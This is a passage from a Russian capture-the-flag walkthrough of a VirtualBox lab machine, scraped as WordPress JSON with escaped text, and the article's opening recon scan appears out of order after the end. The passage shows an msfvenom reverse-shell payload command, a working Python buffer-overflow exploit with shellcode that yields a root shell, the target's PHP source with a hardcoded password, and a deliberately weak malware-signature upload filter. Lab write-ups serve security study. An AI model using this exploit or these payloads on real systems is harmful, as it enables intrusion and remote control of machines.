  \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0448\u0435\u043b\u043b\u043e\u043c \u0438\u0437 Metasploit<\/i>:  <\/p>\n
$ sudo msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=192.168.1.124 LPORT=9999 -f python -b "\\x00\\x0a\\x0d"<\/code><\/pre>\n
  <\/p>\n
import socket  port = 7788 host = '192.168.1.116' agent_id = 48093572 buf =  "" buf += "\\xba\\xd0\\xda\\xa0\\x74\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x58\\x33" buf += "\\xc9\\xb1\\x12\\x31\\x50\\x15\\x03\\x50\\x15\\x83\\xe8\\xfc\\xe2" buf += "\\x25\\xeb\\x7b\\x83\\x26\\x5f\\x3f\\x3f\\xc2\\x62\\x0f\\xd9\\x9b" buf += "\\x82\\xa2\\xa6\\x0c\\x1f\\x55\\x67\\x9a\\xa1\\xd9\\x0f\\xd8\\xa1" buf += "\\x06\\xdf\\x55\\x40\\x22\\xb9\\x3d\\xd3\\xe2\\x12\\x34\\x32\\x47" buf += "\\x50\\xc6\\x07\\x4f\\xd3\\xc6\\x77\\x50\\x23\\x4f\\x94\\x91\\xc8" buf += "\\x43\\x9a\\xf1\\x03\\xeb\\x61\\x3b\\x9b\\x50\\x13\\x22\\x05\\xd0" buf += "\\x2f\\x15\\x35\\xd1\\xb0\\xaa\\xdb" shell = buf shell += "\\x90"*(168-len(shell))<\/code><\/pre>\n
  \u0415\u0441\u043b\u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u0438\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c\u0441\u044f, \u043d\u0430 \u0432\u044b\u0432\u043e\u0434 peda<\/i> \u043f\u043e\u0441\u043b\u0435 \u043a\u0440\u0430\u0445\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u043e\u0442\u043b\u0430\u0434\u043a\u0438, \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0440\u0435\u0433\u0438\u0441\u0442\u0440 EAX \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u043d\u0430\u0447\u0430\u043b\u043e \u0441\u0442\u0435\u043a\u0430:
  <\/p>\n
  \u041d\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u043e\u043c \u0445\u043e\u0441\u0442\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d ASLR, \u044d\u0442\u043e \u0432\u0438\u0434\u043d\u043e \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b:  <\/p>\n
> cat \/proc\/sys\/kernel\/randomize_va_space 2<\/code><\/pre>\n
  \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u043c\u0435\u0442\u043e\u0434\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0442\u0430\u043a \u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d \u043a\u0430\u043a ret2reg<\/i>. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u0442\u0443\u0442<\/a> \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u043e \u043d\u0451\u043c \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c. 
  <\/p>\n
  \u041d\u0443\u0436\u043d\u044b\u0439 \u043d\u0430\u043c \u0430\u0434\u0440\u0435\u0441 (0x08048563) \u043d\u0430\u0439\u0434\u0435\u043d. \u0414\u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c \u0435\u0433\u043e \u0432 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442:  <\/p>\n
shell += "\\x63\\x85\\x04\\x08" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.sendall('%s\\n' %(agent_id)) s.sendall('3\\n') s.sendall(shell) data = s.recv(1024) print(data)<\/code><\/pre>\n
  \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c Metasploit<\/i>:
  <\/p>\n
  \u041d\u0430\u043a\u043e\u043d\u0435\u0446, \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043d\u0430\u0448\u0435\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0448\u0435\u043b\u043b \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root<\/i>:  <\/p>\n
$ python .\/exploit_bof.py<\/code><\/pre>\n
  <\/p>\n
  \u0418 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0444\u043b\u0430\u0433:
  
  \u0414\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u043c \u0435\u0433\u043e:  <\/p>\n
$ echo R2gwc3RQcm90MGMwbHM= | base64 -d Gh0stProt0c0ls<\/code><\/pre>\n
  <\/p>\n
  P.S. \u0412\u043e\u0442 \u0442\u0430\u043a \u0432\u044b\u0433\u043b\u044f\u0434\u044f\u0442 \u0444\u0430\u0439\u043b\u044b \u0438\u0437 \u043a\u043e\u0440\u043d\u0435\u0432\u043e\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430:  <\/p>\n
index.php<\/b><\/p>\n
\n
<?php session_start(); $loggedin=false; if ($_SESSION['admin_logged_on'] == 'that is affirmative sir') { \techo "flag3{Y29udGludWVUT2Ntcw==}<br \/>Welcome, ".$_POST["user"] . "<br \/><a href='cms.php?pagename=home'>IMF CMS<\/a>"; \t$loggedin=true; } elseif (isset($_POST["user"]) && isset($_POST["pass"])) {     $password = "398fj289fj2389fj398fjhhds^&#hkseifw3893h#(&$$*838hjf";     sleep(3); \/\/ do not bruteforce     if ($_POST["user"]=='rmichaels') {         if (strcmp($password, $_POST["pass"]) == 0) {             $_SESSION['admin_logged_on'] = 'that is affirmative sir';             echo "flag3{Y29udGludWVUT2Ntcw==}<br \/>Welcome, ".$_POST["user"] . "<br \/><a href='cms.php?pagename=home'>IMF CMS<\/a>"; \t    $loggedin=true;         } else {             echo "Invalid password";         }     } else {         echo "Invalid username.";     }         } if($loggedin===false) { ?> <form method="POST" action=""> <label>Username:<\/label><input type="text" name="user" value=""><br \/> <label>Password:<\/label><input type="password" name="pass" value=""><br \/> <input type="submit" value="Login"> <!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger --> <\/form> <?php } ?><\/code><\/pre>\n
  <\/div>\n<\/div>\n
  <\/p>\n
uploadr942.php<\/b><\/p>\n
\n
<html> <head> <title>File Uploader<\/title> <\/head> <body> <h1>Intelligence Upload Form<\/h1>  <?php  \/\/ This is an example of how NOT to write a Web Application Firewall function crappyWAF($content) { \t$signatures = array( \t\t'\/\\\/\\*<\\?php \\\/\\*\\*\\\/\/i' => 'Meterpreter payload detected', \t\t'\/eval\/i' => 'Eval php function detected', \t\t'\/base64_decode\/i' => 'Base64_decode php function detected', \t\t'\/fopen\/i' => 'fopen php function detected', \t\t'\/system\/i' => 'system php function detected', \t\t'\/passthru\/i' => 'passthru php function detected', \t\t'\/exec\/i' => 'exec function php detected', \t\t'\/pcntl_exec\/i' => 'pcntl_exec php function detected', \t\t'\/popen\/i' => 'popen php function detected', \t\t'\/fsockopen\/i' => 'fsockopen php function detected', \t\t'\/proc_open\/i' => 'proc_open php function detected', \t\t'\/fclose\/i' => 'fclose php function detected' \t); \tforeach($signatures as $signature=>$reason) { \t\tif(preg_match($signature, $content)) { \t\t\treturn "CrappyWAF detected malware. Signature: " . $reason; \t\t} \t} \treturn true; }  $validextensions = array("jpeg", "jpg", "png", "gif"); if(isset($_FILES['file']['name'])) { \tif(!$_FILES['photo']['error']) { \t\t$temporary = explode(".", $_FILES["file"]["name"]); \t\t$file_extension = end($temporary); \t\tif ($_FILES["file"]["size"] > 100000) { \t\t\tPrint "Error: File size too large."; \t\t} elseif ((($_FILES["file"]["type"] == "image\/png") \t\t\t|| ($_FILES["file"]["type"] == "image\/jpg") \t\t\t|| ($_FILES["file"]["type"] == "image\/jpeg") \t\t\t|| ($_FILES["file"]["type"] == "image\/gif")) \t\t\t&& in_array($file_extension, $validextensions)){ \t\t\t \t\t\t$contents = file_get_contents($_FILES['file']['tmp_name']); \t\t\t$waf = crappyWAF($contents); \t\t\tif($waf!==true) { \t\t\t\tprint "Error: ".$waf; \t\t\t} else { \t\t\t\tif(exif_imagetype($_FILES['file']['tmp_name'])!==false) { \t\t\t\t\t\/\/PHP Image Uploading Code \t\t\t\t\t$new_file_name = substr( md5(rand()), 0, 12); \t\t\t\t\tmove_uploaded_file($_FILES['file']['tmp_name'], 'uploads\/'.$new_file_name.".".$file_extension); \t\t\t\t\tprint "File successfully uploaded.\\n"; \t\t\t\t\tprint "<!-- " . $new_file_name . " -->"; \t\t\t\t} else { \t\t\t\t\tprint "Error: Invalid file data."; \t\t\t\t} \t\t\t} \t\t} else { \t\t\tprint "Error: Invalid file type."; \t\t} \t\t \t} else { \t\tprint "Error uploading file."; \t} }  ?> <form id="Upload" action="" enctype="multipart\/form-data" method="post"> \t<p>  \t\t<label for="file">File to upload:<\/label>  \t\t<input id="file" type="file" name="file">  \t<\/p>                        <p>      \t<input id="submit" type="submit" name="submit" value="Upload">      <\/p>  <\/form>  <\/body> <\/html><\/code><\/pre>\n
  <\/div>\n<\/div>\n
 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438  https:\/\/habrahabr.ru\/post\/318814\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
<\/p>\n
$ sudo arp-scan -l -I wlan0| grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV -p1-65535<\/code><\/pre>\n
  <\/p>\n
Starting Nmap 7.01 ( nmap.org<\/a> ) at 2016-12-25 22:41 MSK
  Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
  SYN Stealth Scan Timing: About 1.40% done; ETC: 22:44 (0:03:31 remaining)
  Nmap scan report for 192.168.1.116
  Host is up (0.00046s latency).
  PORT STATE SERVICE VERSION
  80\/tcp open http Apache httpd 2.4.18 ((Ubuntu))
  MAC Address: 08:00:27:40:8D:1B (Oracle VirtualBox virtual NIC)<\/p><\/blockquote>\n
  <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-283321","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/283321","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=283321"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/283321\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=283321"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=283321"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=283321"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}